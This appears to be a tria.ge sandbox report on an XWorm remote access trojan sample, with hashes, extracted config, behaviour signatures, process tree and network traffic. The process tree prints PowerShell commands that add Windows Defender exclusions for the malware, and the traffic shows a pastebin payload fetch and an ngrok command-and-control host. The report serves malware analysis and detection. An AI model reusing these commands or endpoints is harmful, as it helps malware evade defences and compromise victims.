Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

Dropper/Berbew.exe

windows7-x64

10

Dropper/Berbew.exe

windows10-2004-x64

10

Dropper/Phorphiex.exe

windows7-x64

10

Dropper/Phorphiex.exe

windows10-2004-x64

10

RAT/31.exe

windows7-x64

10

RAT/31.exe

windows10-2004-x64

10

RAT/XClient.exe

windows7-x64

10

RAT/XClient.exe

windows10-2004-x64

10

RAT/file.exe

windows7-x64

7

RAT/file.exe

windows10-2004-x64

7

Ransomware...-2.exe

windows7-x64

10

Ransomware...-2.exe

windows10-2004-x64

10

Ransomware...01.exe

windows7-x64

10

Ransomware...01.exe

windows10-2004-x64

10

Ransomware...lt.exe

windows7-x64

10

Ransomware...lt.exe

windows10-2004-x64

10

Stealers/Azorult.exe

windows7-x64

10

Stealers/Azorult.exe

windows10-2004-x64

10

Stealers/B...on.exe

windows7-x64

10

Stealers/B...on.exe

windows10-2004-x64

10

Stealers/Dridex.dll

windows7-x64

10

Stealers/Dridex.dll

windows10-2004-x64

10

Stealers/M..._2.exe

windows7-x64

10

Stealers/M..._2.exe

windows10-2004-x64

10

Stealers/lumma.exe

windows7-x64

1

Stealers/lumma.exe

windows10-2004-x64

10

Trojan/BetaBot.exe

windows7-x64

10

Trojan/BetaBot.exe

windows10-2004-x64

10

Trojan/Smo...er.exe

windows7-x64

10

Trojan/Smo...er.exe

windows10-2004-x64

10

Resubmissions

03/09/2024, 14:02 UTC

240903-rb57sazdqf 10

03/09/2024, 13:51 UTC

240903-q59avszclf 10

02/09/2024, 19:51 UTC

240902-yk8gtsxbpd 10

02/09/2024, 02:27 UTC

240902-cxh7tazflg 10

02/09/2024, 02:26 UTC

240902-cwxc2sygll 10

21/06/2024, 19:37 UTC

240621-yca7cszgnd 10

09/06/2024, 17:07 UTC

240609-vm7rjadd73 10

13/05/2024, 17:36 UTC

240513-v6qblafe3y 10

12/05/2024, 17:17 UTC

240512-vty3zafh5s 10

Analysis

  • max time kernel
    148s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    12/05/2024, 17:17 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RAT/XClient.exe

  • Size

    172KB

  • MD5

    75ba783757c5b61bd841afa136fc3eda

  • SHA1

    8db9cda9508471a23f9b743027fa115e01bc1fe1

  • SHA256

    75a8719e83e4aecbe51287d7bfaf1e334fa190c7784324f24bcf61ab984de20a

  • SHA512

    9a6cfbf4302336662527837bf60b30b458f8d438bd6e9563093d4948bf81c79d56578e965d836e90aafde553d1cdc9c6df81a254aafcfb3379fbe6405dce0ea1

  • SSDEEP

    1536:vJcr5kCyoAp30kaF6CiJzt7UbjFdZe8e6TOAJkU7JsOpysa7iAMI:BcmNNxda6zZUbjHZe8jO6H2OpYuAf

Score
10/10
xwormexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

Attributes
  • Install_directory

    %AppData%

  • install_file

    XClient.exe

  • pastebin_url

    https://pastebin.com/raw/2jTT3Lnj

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RAT\XClient.exe
    "C:\Users\Admin\AppData\Local\Temp\RAT\XClient.exe"
    1⤵
    • Drops startup file
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1616
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RAT\XClient.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2724
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2628
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2756
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:548

Network

  • flag-us
    DNS
    ip-api.com
    XClient.exe
    Remote address:
    8.8.8.8:53
    Request
    ip-api.com
    IN A
    Response
    ip-api.com
    IN A
    208.95.112.1
  • flag-us
    GET
    http://ip-api.com/line/?fields=hosting
    XClient.exe
    Remote address:
    208.95.112.1:80
    Request
    GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sun, 12 May 2024 17:18:16 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 6
    Access-Control-Allow-Origin: *
    X-Ttl: 57
    X-Rl: 41
  • flag-us
    DNS
    pastebin.com
    XClient.exe
    Remote address:
    8.8.8.8:53
    Request
    pastebin.com
    IN A
    Response
    pastebin.com
    IN A
    104.20.3.235
    pastebin.com
    IN A
    104.20.4.235
    pastebin.com
    IN A
    172.67.19.24
  • flag-us
    GET
    https://pastebin.com/raw/2jTT3Lnj
    XClient.exe
    Remote address:
    104.20.3.235:443
    Request
    GET /raw/2jTT3Lnj HTTP/1.1
    Host: pastebin.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sun, 12 May 2024 17:18:19 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1;mode=block
    cache-control: public, max-age=1801
    CF-Cache-Status: HIT
    Age: 2
    Last-Modified: Sun, 12 May 2024 17:18:17 GMT
    Server: cloudflare
    CF-RAY: 882c113e9afd60de-LHR
  • flag-us
    DNS
    7.tcp.eu.ngrok.io
    XClient.exe
    Remote address:
    8.8.8.8:53
    Request
    7.tcp.eu.ngrok.io
    IN A
    Response
    7.tcp.eu.ngrok.io
    IN A
    35.157.111.131
  • flag-us
    DNS
    7.tcp.eu.ngrok.io
    XClient.exe
    Remote address:
    8.8.8.8:53
    Request
    7.tcp.eu.ngrok.io
    IN A
    Response
    7.tcp.eu.ngrok.io
    IN A
    3.124.67.191
  • flag-us
    DNS
    7.tcp.eu.ngrok.io
    XClient.exe
    Remote address:
    8.8.8.8:53
    Request
    7.tcp.eu.ngrok.io
    IN A
    Response
    7.tcp.eu.ngrok.io
    IN A
    3.68.56.232
  • 208.95.112.1:80
    http://ip-api.com/line/?fields=hosting
    http
    XClient.exe
    264 B
     307 B
     4
    3

    HTTP Request

    GET http://ip-api.com/line/?fields=hosting

    HTTP Response

    200
  • 104.20.3.235:443
    https://pastebin.com/raw/2jTT3Lnj
    tls, http
    XClient.exe
    869 B
     5.7kB
     10
    10

    HTTP Request

    GET https://pastebin.com/raw/2jTT3Lnj

    HTTP Response

    200
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 35.157.111.131:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     80 B
     3
    2
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 3.124.67.191:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 3.68.56.232:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 3.68.56.232:15249
    7.tcp.eu.ngrok.io
    XClient.exe
    152 B
     120 B
     3
    3
  • 8.8.8.8:53
    ip-api.com
    dns
    XClient.exe
    56 B
     72 B
     1
    1

    DNS Request

    ip-api.com

    DNS Response

    208.95.112.1

  • 8.8.8.8:53
    pastebin.com
    dns
    XClient.exe
    58 B
     106 B
     1
    1

    DNS Request

    pastebin.com

    DNS Response

    104.20.3.235
    104.20.4.235
    172.67.19.24

  • 8.8.8.8:53
    7.tcp.eu.ngrok.io
    dns
    XClient.exe
    63 B
     79 B
     1
    1

    DNS Request

    7.tcp.eu.ngrok.io

    DNS Response

    35.157.111.131

  • 8.8.8.8:53
    7.tcp.eu.ngrok.io
    dns
    XClient.exe
    63 B
     79 B
     1
    1

    DNS Request

    7.tcp.eu.ngrok.io

    DNS Response

    3.124.67.191

  • 8.8.8.8:53
    7.tcp.eu.ngrok.io
    dns
    XClient.exe
    63 B
     79 B
     1
    1

    DNS Request

    7.tcp.eu.ngrok.io

    DNS Response

    3.68.56.232

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    89b21b247053d6078a488b25f9418948

    SHA1

    3bc31609ea0db6cce2ea19da940f1a7791efd49f

    SHA256

    f69e1e89ef2db2c4ec8f292e751a9ae2b2b8ccfb9505af440b2299c086fc2972

    SHA512

    4c07248e43c6faeb4e6a6426bc12bf443e1e200cec8170a743eb66ad718d400104b3bb4f7c8fbe5b04bd8315eca77e1bb443141d7a880b8ae4c87cd39d308b06

    Download Submit

  • memory/1616-0-0x000007FEF50E3000-0x000007FEF50E4000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1616-1-0x0000000001010000-0x0000000001040000-memory.dmp

    Filesize

    192KB

    Download

  • memory/1616-2-0x000007FEF50E0000-0x000007FEF5ACC000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/1616-32-0x000007FEF50E3000-0x000007FEF50E4000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1616-33-0x000007FEF50E0000-0x000007FEF5ACC000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2628-14-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2628-15-0x00000000022C0000-0x00000000022C8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2724-8-0x0000000002890000-0x0000000002898000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2724-7-0x000000001B450000-0x000000001B732000-memory.dmp

    Filesize

    2.9MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.